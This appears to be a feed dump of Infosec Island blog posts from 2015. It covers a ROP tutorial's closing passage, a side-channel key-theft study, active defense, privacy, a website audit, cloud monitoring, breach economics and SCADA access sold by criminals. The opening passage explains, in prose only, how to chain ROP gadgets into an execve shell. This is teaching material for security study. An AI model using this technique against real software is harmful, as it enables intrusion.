While there are many different ways to spawn a shell through ROP, my approach was to pick a predictable address in the program’s data section and use this to arrange the needed data structures. My rw memory starts at 0x080ca660, so I started by loading this address into ECX and the filling a register (I used EAX) with the first 4 bytes of the filename I wanted to execute (/bin) and then moving EAX into the dereferenced address at ECX (my storage area).

This process is repeated, advancing ECX 4 bytes each time until the complete null terminated command filename is specified. I then used the next 4 bytes of my memory pool to store the address of where the filename is specified (this makes up the argument pointer). For the env pointer, I used similar logic. With the command address loaded into EBX, the execve call number in EAX, the argument pointer in ECX, and the envp pointer in EDX, it is now time to call the ‘int 0x80’ gadget to invoke the system call.

Exploiting the target now is just a matter of supplying the crafted input and then interacting with the shell it has spawned:

Return-Oriented Programming (ROP) 101 (8)

Title image courtesy of ShutterStock

This was cross-posted from Tripwire's The State of Security blog.

Copyright 2010 Respective Author at Infosec Island]]>
Enable the Business? Sometimes Security Must Say “NO”… https://www.infosecisland.com/blogview/24616-Enable-the-Business-Sometimes-Security-Must-Say-NO.html https://www.infosecisland.com/blogview/24616-Enable-the-Business-Sometimes-Security-Must-Say-NO.html Thu, 25 Jun 2015 11:13:24 -0500 Business: Saying NO is not an option. Security must enable the business! What is the next best option, apart from your current position of “NO, do NOT do this!!!”?

Security: There are no good options here; we did the analysis several times, consultants andGartner GTP analysts confirmed our findings.

Business: Remember that bit about “enabling the digital business”?!! You cannot say “no” – you must deliver us the next best option to enable us.

Security: Well … you can try doing X or Y, with additional safeguards of Z and U implemented.

Business: OK, that’s better! What are the known consequences of using this approach that you are suggesting?

Security: A huge meteor swarm hits Earth, everybody dies.

Business: Uh…OK. Business has the right to accept the risks, right?! Risk accepted.

0-meteor-hits

BOOM!!! Everybody dies.

5,000 years pass by…

An alien spaceship finds the now-defunct Earth, lands, and alien archeologists – in a bout of deeply alien curiosity – decide to figure out “what killed Earth?”

1-ufo-lands

They find a record of the above conversation on a miraculously survived tablet device and an argument starts between the aliens: who killed everybody on Earth, SECURITY or BUSINESS?

So, who do you think did? Essentially, there are two camps of … ahem… aliens arguing:

  1. Security is at fault – they did not communicate the risks well enough, or…
  2. Business [government agency] is at fault – they were stupidly negligent and didn’t listen to clear and precise communication, backed up by facts and external experts.

Which one sounds closer to the truth, if there is such a thing here?

Of course, this is not a blog post about the OPM breach. It is a parable about the fine line we have to tread in our daily jobs. As a security technologist you may be asked to do the impossible. While I think optimism is a great belief system, sometimes the impossible is not just very difficult… it is actually frigging’ IMPOSSIBLE. And so-called “next best option” is that you all friggin’ die!

For example:

  • An enterprise-grade “APT-ready” SOC at $0 … no good options!
  • An in-house run SIEM with no personnel dedicated to it … no good options!
  • Patch as fast as possible – with no automation and fragile legacy systems … no good options!
  • Processing super-secret data on an employee-owned PC on public wifi … no good options!

Conclusion: sometimes, “NO” is the right answer! Well, that and digging a deep enough bunker or moving to a space station before the meteor swarm hits!

This was cross-posted from the Gartner blog.

Copyright 2010 Respective Author at Infosec Island]]>
Researchers Demonstrate Stealing Encryption Keys Via Radio https://www.infosecisland.com/blogview/24614-Researchers-Demonstrate-Stealing-Encryption-Keys-Via-Radio.html https://www.infosecisland.com/blogview/24614-Researchers-Demonstrate-Stealing-Encryption-Keys-Via-Radio.html Wed, 24 Jun 2015 10:54:37 -0500 Researchers at Tel Aviv University have demonstrated a method of stealing encryption keys from a PC using a radio receiver small enough to hide inside a piece of pita bread.

In a paper, the researchers outlined new side-channel attacks on RSA and ElGamal implementations that use the popular sliding window or fixed window modular exponentiation algorithms. The attacks can extract decryption keys using a low measurement bandwidth even when attacking multi-GHz CPUs, the researchers found.

"We demonstrate the extraction of secret decryption keys from laptop computers, by nonintrusively measuring electromagnetic emanations for a few seconds from a distance of 50 cm," the researchers explained in an online summary of the paper. "The attack can be executed using cheap and readily-available equipment: a consumer-grade radio receiver or a Software Defined Radio USB dongle. The setup is compact and can operate untethered; it can be easily concealed, e.g., inside pita bread."

Read the rest of this story on SecurityWeek.com.

Copyright 2010 Respective Author at Infosec Island]]>
Thoughts on the Active Defense Debate https://www.infosecisland.com/blogview/24613-Thoughts-on-the-Active-Defense-Debate.html https://www.infosecisland.com/blogview/24613-Thoughts-on-the-Active-Defense-Debate.html Wed, 24 Jun 2015 10:49:20 -0500 I’d like to take a moment of your time to talk about the hacking the hackers debate. I recently read the article Hack the Hackers? The Debate Rages On, and the two themes were do it and don’t do it.

Both sides had great points and it almost seemed to me like there was somewhat of an agreement.

It appears to me that on the side opposing an active defense strategy, knowledge is the problem. I am not referring to the knowledge of the individuals and their ability to break into the bad guy’s systems and networks, my take away is that the knowledge of internal networks, data value, and location are the knowledge issues.

I also agree that if you don’t know your network, valuable assets and resources, and where your intellectual property is stored developing an active defense strategy of hacking back is futile.

There is a mantra among infosec vendors: People, Process, and Technology. I have heard this from nearly every sales rep, director and VP at every company I have worked, and from every vendor I have worked with, for the past twenty years. It isn’t a bad mantra either.

In fact, it creates a thought process around the base of business problems as they relate to addressing those problems.

It makes sense that if you have a plan that includes a policy and process to defend, detect and respond that you have an advantage. Having a good foundation that goes through a periodic peer review and regular updates to address emerging threats and technology provides the building blocks of a stronger security posture.

The best security practitioners have a plan and in most cases work to build the plan into a process and then this becomes a policy.

Another part of the mantra, technology, is the part that addresses a business problem. This is where a majority of vetting is applied. A problem emerges or rises to the top, research on a solution is started, vendors and professionals gather to offer solutions, more research is conducted, testing occurs on the proposed solutions and somewhere down the line a decision is made to address the problem.

Often there is a large amount of scrutiny on the technical solution. Features and functions are run through the gamut, security of the solution is verified, tested and validated by vendors and purchasers, proof of concepts are run and an based on a successful actionable success criteria the problem is addressed through a build or buy approach.

People (expertise) is the last part of the mantra. Largely, this is an approach to teach about the technologies that are introduced to solve the business problem being addressed.

This consists of the one on one knowledge transfers between vendor engineers and customer end user, executive to executive solution explanation, presentation delivery, formal training and continued education.

It is part of the process of selling, purchasing and building solutions to real security issues. Solution expertise can be very impactful to an organization or an individual.

It can lead to millions of dollars of savings, a new practice that creates envy in an industry, a strong referenceable security practice and team visibility in an organization where executives can feel secure and proud of the achievements of their team members.

It can also lead to recognition, the development path of a career, certification of knowledge and a cool badge or title on the business card of an individual that displays how hard they have worked to accomplish something of value.

People, in my opinion, the most important part of the mantra. This also leads back to the discussion of hacking the hackers.

We develop knowledge as we need it. I am going to wager that a large majority of those of us in the InfoSec community studied some form of CompSci at some point. I am also going to wager that though we had some really amazing instructors, professors and mentors, we did a bunch of the learning on our own.

My point is that we are all Autodidacts. Meaning that we are a population of self-educating professionals. This includes those of us with advanced degrees and education, because in reality, institutions of higher learning cannot teach everything.

We read, research and test technologies in order to have a better understanding, and because what we do is fun and cool. We are at an exciting time where information is at our fingertips and can be obtained from multiple sources at anytime from nearly anywhere.

This should give us the drive to learn better methodologies to defend our resources. Sadly, however, this supports the anti active defense hack the hacker strategy.

There is a small portion of this community that has the deep skill set to stage a response attack. I’m not sure if the lack of the skillset is related to learning priorities, time, fear (of failure or success), and interest or comfort level. Maybe it is because of where we are in our careers or what we have learned that pushed us forward.

The future does look brighter though. Today, children as young as four and five have access to technology learning resource like Raspberry Pi and entry level programming resources, IDTech camps (paid camp) provide learning experiences that make technology cool and fun and there are free resources to learn and expand the mind of today’s youth in large part to the general technology community.

My hope is that the generation of children being raised today will have both the attack and defense skills to tackle the business problems of now and the future.

Rafal Los (@Wh1t3Rabbit on twitter), director of solutions research & development at Accuvant, was quoted in CSOOnline’s article saying he “believes if defenders do what attackers have been doing – learning about their adversaries’ tactics, capabilities and tools – they will be more successful…” and “defenders need to know much more about their own environment.”

I believe that he is absolutely correct. However, I also see this as a challenge to organizations to improve their defense. Organizations large and small need to run a better defense and get better at securing their assets, only then should an attack response be considered.

This was cross-posted from the Dark Matters blog. 

Copyright 2010 Respective Author at Infosec Island]]>
Privacy Concerns Changing the Playing Field for Brands https://www.infosecisland.com/blogview/24612-Privacy-Concerns-Changing-the-Playing-Field-for-Brands.html https://www.infosecisland.com/blogview/24612-Privacy-Concerns-Changing-the-Playing-Field-for-Brands.html Wed, 24 Jun 2015 10:45:37 -0500 The competition for consumer attention has led some brands to blur the lines between targeted marketing and privacy violations. Adding to the stress in the relationship between customers and their brands are the ever-present cyber threats targeting private data. New data suggests there are consequences for companies that don’t take their customers’ private information as seriously as the customers do.

In an article posted on CIO magazine, author Tom Kaneshige references a Forrester report with the following statistics:

  • 46 percent of smartphone users have experienced a company taking advantage of their personal data and using it for something other than a previously agreed upon purpose, according to a Loudhouse-Orange survey.
  • Just four spatio-temporal points are enough to uniquely identify 95 percent of individuals, a New York Times article says.
  • A Carnegie Mellon University study found that a person's location has been shared an average 5,398 times.

Kaneshige emphasizes in the article that consumers show their dissatisfaction with their wallets. He cites Forrester Research, which shows one out of three US adults has canceled a transaction because of privacy concerns.

In a co-webinar with RiskIQ titled, ‘Brand Security and the CISO Safeguarding the Company’s Critical Digital Footprint’, Forrester Analyst Nick Hayes discussed a recent study from the Reputation Institute. In most cases a person’s willingness to buy from, work for, and invest in a company is driven by their perceptions of the company. The product or services that the company provides are most often secondary considerations. Forrester also points out that information security and privacy are the top concerns for global business and IT decision makers (full Forrester report go here).

The lines between cyber security and privacy are blurring, if they ever were mutually exclusive. This year’s Verizon Data Breach Investigations Report showed that 70% of web app attacks in 2014 were strategic in nature. The true targets weren’t the companies that own the apps, but the patrons that utilize those digital assets. Those attacks were aimed at capturing private data.

Black markets are awash with various sets of private data belonging to individuals — and cyber thieves are monetizing from it in many diverse ways. Cyber criminals’ or Nation State actors’ goals range from various money-making schemes like affiliate fraud to capturing login credentials that can be used in future breaches.

The problem is that internal security isn’t enough to secure customers. Traditional security best practices dictate strong encryption and defense-in-depth postures. The problem is that these strategies leave gaps in security outside the firewall. Even if good encryption is used and endpoint scanning solutions are in place, many digital assets existing in web, mobile, and social are outside the walled garden — often leaving them unaccounted for and unguarded.

The various threats may or not be immediately visible to security folks, but they do exist — and they can be impactful. In situations of unusually high frequencies of cancelled transactions, more vigilance on the part of the consumer, complaints on social media, etc. there may be some security breakdowns occurring outside the firewall.

The key to ensuring safe communications with users is to first understand that what exists on the Internet leads back to the company. This would be your org’s Digital Footprint—all the web, mobile, social, and rogue assets that exist online and are discoverable by your customers or your adversaries.

Understanding where all those assets are and managing them from one location is critical. By proactively monitoring all apps, landing pages, affiliate sites, etc. teams can defend the security of their brand and limit private data leakage.

This was cross-posted from the RiskIQ blog.

Copyright 2010 Respective Author at Infosec Island]]>
Half of All Websites Tested Failed Security and Privacy Assessment https://www.infosecisland.com/blogview/24611-Half-of-All-Websites-Tested-Failed-Security-and-Privacy-Assessment.html https://www.infosecisland.com/blogview/24611-Half-of-All-Websites-Tested-Failed-Security-and-Privacy-Assessment.html Tue, 23 Jun 2015 11:58:57 -0500 Half of the nearly 1000 websites evaluated in the 2015 Online Trust Audit & Honor Roll study conducted by the Online Trust Alliance (OTA) were found to be failing to protect consumer’s personal data and privacy.

News and media websites had the lowest overall scores at an 80% fail rate, and for the third consecutive year Twitter scored highest among all websites tested.

The OTA, a non-profit organization that works to enhance online trust, announced the results of its seventh annual website security audit, grading some of the most popular websites based on dozens of criteria in three main categories: Consumer protection, privacy, and website security.

This year’s audit was expanded and include the websites of the top fifty leadingInternet of Things (IoT) device makers, companies which offer wearable technologies and Internet connected home products, finding that 76% of the websites failed the assessment.

The media and IoT sectors scored poorly primarily due to the lack of adequate privacy policies and substandard domain and protections to prevent the loss of consumer’s personal and financial information.

“The results of this audit serve as a wake-up call to Internet of Things companies who are handling highly sensitive, dynamic and personal data,” said Craig Spiezle, Executive Director and President of OTA.

“In rushing their products to market without first addressing critical data management and privacy practices, they are putting consumers at risk and inviting regulatory oversight.”

Despite setting the most difficult criteria for this year’s audit, the OTA found that 44% of the websites evaluated across multiple sectors qualified for organization’s 2015 Honor Roll, a significant improvement over last year’s level of 30%.

None-the-less, 46% of all websites audited failed completely, with an additional 10% failing to perform well enough to earn an Honor Roll status, where a failure indicates that the website is vulnerable to exploits, is not protecting consumers from phishing and social engineering threats, or has insufficient privacy policies and disclosure policies.

Top scorers in each industry:

  • Banking: USAA Federal Savings Bank
  • Government: Federal Deposit Insurance Corporation (FDIC)
  • Internet of Things: Dropcam
  • News/Media: Bloomberg Businessweek
  • Retail: American Greetings Interactive
  • Social Media: Twitter

Industry Highlights:

  • Retailers: The retail sector saw the largest increase in Honor Roll qualification, from 24% of evaluated websites in 2014 to 42% in 2015
  • Banks: The banking industry also saw a major uptick in Honor Roll qualifications, from 33% of evaluated websites in 2014 to 46% in 2015
  • Social Media: Websites in the social networking category boasted the highest percentage of Honor Roll qualifiers among industries at 58%
  • Government: This sector amassed the highest average privacy score among all evaluated industries, with 42% of government sites making the Honor Roll
  • News: Media websites fared even worse than the IoT sector, with only 8% qualifying for the Honor Roll, and 80% failing due to poor email authentication privacy standards

“Our audit and Honor Roll program rewards companies for a commitment to data stewardship, security and privacy policies that protect against cybercrime’s escalating threats,” said Spiezle.

“OTA commends the companies whose dedication to responsible data practices earned them a place on our list. At the same time, it is concerning to see others remain complacent, failing to embrace responsible practices year after year.”

This was cross-posted from the Dark Matters blog.

Copyright 2010 Respective Author at Infosec Island]]>
Trouble In The Cloud?! https://www.infosecisland.com/blogview/24610-Trouble-In-The-Cloud.html https://www.infosecisland.com/blogview/24610-Trouble-In-The-Cloud.html Tue, 23 Jun 2015 11:55:00 -0500 What challenges does the usage of traditional, on-premise security tools [monitoring tools, like SIEM or DLP, in particular] creates in the cloud [SaaS, PaaS, IaaS models]?

Here are some I’ve come across:

  • IaaS
    • IP address means less for tracking all the transient and replaceable instances
    • Rapid provisioning makes assets to appear and disappear, go up and down, in and out of scope, etc
    • Auto-scaling busts tool licensing limits (!) and disrupts node-based asset tracking (“we have 400 assets…ooops…3000..ooops 200 now!”), creates large volumes of monitoring data for some periods of time
    • Remote cloud environments are sometimes accessed via links of limited bandwidth, making it harder to move monitoring data from the cloud to the datacenter
    • Different models for network security monitoring (only at instances, not in between “on the network”)
  • PaaS and SaaS
    • There are layers of the computing stack that are not under enterprise control; no network monitoring, no host monitoring (SaaS)
    • No concept of “asset IP” or, in fact, of a computer as an IT asset
    • For both SaaS and PaaS, lack of any traditional “IT infrastructure” such as OS
    • No OS logs – “apps all the way down” (SaaS)
    • No perimeter monitoring.

On top of this, many cloud environments run under a very “alien” (aka DevOps) IT operations model, often dissimilar from traditional data center management models, that further breaks down the effectiveness of on-premise security tools.

What others examples of traditional, on-premise security tools not working in the cloud have you seen?

This was cross-posted from the Gartner blog.

Copyright 2010 Respective Author at Infosec Island]]>
We Need a New FUD https://www.infosecisland.com/blogview/24609-We-Need-a-New-FUD.html https://www.infosecisland.com/blogview/24609-We-Need-a-New-FUD.html Tue, 23 Jun 2015 11:51:38 -0500 One of the most common questions I hear debated in infosec (usually rhetorical) is – “what will it take for management to realize how important security is?” I think we’ve all kind of been waiting for that one breach that’s SO bad, or expect that the total volume of breaches and updates from Krebs will reach a tipping point that forces execs and board members to acknowledge that security is critical and pay more attention to it. Folks, I’m not sure it’s going to happen. In fact, I’m willing to argue that “breach weariness” is most certainly never going to be the catalyst for increased investment in security, and really bad/big breaches likely won’t either.

I did a bit of research on some of the top breaches of the last decade, primarily based on the number of records accessed or exposed. A great site to visually see this quickly is “Information is Beautiful”, here. I then went and charted the stock performance of the public companies on the list, and the results may actually surprise you. In short, companies that have experienced breaches are not just overcoming the incident, but thriving. Here are some examples:

Heartland Payments:
Heartland

 

 

 

 

 

 

TJX Companies:

TJX

 

 

 

 

 

 

 

Adobe Systems:

Adobe

 

 

 

 

 

 

 

Global Payments:

Global

 

 

 

 

 

 

 

Target:

Target

 

 

 

 

 

 

 

Could this be entirely coincidental? Sure. In fact, what I am NOT asserting is a definitive correlation between breaches and corporate success – although if you had created a stock fund with breached companies, you’d likely have outperformed the market considerably. What I AM suggesting is that we have a bigger problem, and that’s one of credibility at the business level. No one wants to be breached (DUH). There ARE impacts – fines, breach cleanup costs, short-term reputation impacts, and so on. Neither security professionals nor executives want to experience any of this. However, business execs will look at companies who have experienced breaches, weathered the storm, and even RALLIED….and they will not be inclined to turn the whole ship to spending lots of time and money on security initiatives.

I think it’s important that we realized that in our little echo chamber, this is the most important issue all the time. To executives and business professionals, this is just another issue to contend with. We need a better business case for security than “we could be breached”. Based on some of the data I am seeing (which incidentally, many others have delved into better than I have), it’s going to be a hard sell to use breach FUD as a catalyst for change in our security posture.

This was cross-posted from the ShackF00 blog.

Copyright 2010 Respective Author at Infosec Island]]>
SCADA Systems Offered for Sale in the Underground Economy https://www.infosecisland.com/blogview/24608-SCADA-Systems-Offered-for-Sale-in-the-Underground-Economy.html https://www.infosecisland.com/blogview/24608-SCADA-Systems-Offered-for-Sale-in-the-Underground-Economy.html Mon, 22 Jun 2015 11:56:00 -0500 SCADA, Supervisory Control and Data Acquisitions, are computer systems that control various real-world equipment. These machines are crucial parts of production lines, power plants and nuclear facilities. They were relatively unknown, even to information security experts, that was until Stuxnet was detected. Stuxnet, a malware supposedly developed by the United States and Israel, targeted SCADA systems in Iran’s Natnaz nuclear facility. By infecting the control systems, the malware was able to spin nuclear fuel enrichment centrifuges out of control and cause major damage to Iran’s nuclear efforts until Stuxnet’s detection. After its detection, SCADA became one of the most talked about subjects in cyber security. Stuxnet made everyone realize that cyber attacks can have a impact on the real world – and because of that they are major targets to attackers.

Now, access to such compromised systems is being sold in the underground economy.

A fraudster has recently posted in several underground forums that he is selling access to SCADA systems. Concerned that many criminals will not understand what’s being offered for sale, he started his post with the Wikipedia definition of SCADA. Afterwards, trying to bank on recent news, he noted they would be perfect for “duqu 2.0” (a recently discovered malware which was most likely developed by a country to spy on the Iranian Nuclear talks).

CHn5xVjUsAAKZiH.png-large

Click on image to expand

As the underground is filled with fraudsters who make bogus claims in attempts to rip off interested buyers, the fraudster posted proof that he truly does have access to such systems – a screen shot from a supposedly compromised SCADA system. The screen shot appears to be from a SCADA system in France, which might be part of some hydro-electric generator.

CHn6EHvUwAAqPpl.png-large

Click on image to expand

In a closed underground forum, the fraudster also shared three IP addresses and VNC passwords (remote desktop) to three SCADA systems, to further solidify his claims. All three IP addresses are also in France. Two of them are on Orange FR’s IP range and the third is on the IP range of Keyyo.

We haven’t attempted to connect to these systems and cannot validate the information.

So, is this the smoking gun security experts have been waiting for? are cybercriminals now joining forces with government hackers to take on SCADA systems, potentially causing harm in the real world? Most likely not, a single offering from a vendor does not constitute as a trend. However, assuming the vendor is not making these claims for the purpose of ripping off people, the fact that compromised SCADA systems are now offered for sale for anyone to purchase, including jihadists and hacktivists, should not be taken lightly. Even if it is the one vendor, at the moment, compromised SCADA systems are currently just a Bitcoin transfer away to anyone with access to these forums. If this would turn into a trend, and only time would tell if it does, vulnerable SCADA systems would become much more available to interested attackers, including ones who are not technically capable.

About the Author: Idan Aharoni is the founder & CEO of Inteller, a leading provider of web intelligence solutions. Idan was the Head of Cyber Intelligence at RSA where he was responsible for gathering, analyzing and reporting intelligence findings on cybercrime and fraud activity. Idan joined Cyota (later acquired by RSA) in February 2005 as an analyst at the Anti-Fraud Command Center. In 2006, he founded the FraudAction Intelligence team, which he led until 2013. Between his work at the Anti-Fraud Command Center, as well as the unique insight he has gained by the intelligence and discoveries gathered by his team at RSA, Idan offers vast expertise into the underground fraud economy and how cybercriminals operate. 

Cross Posted From Inteller Solutions Blog

Related: Learn More at the 2015 ICS Cyber Security Conference

Copyright 2010 Respective Author at Infosec Island]]>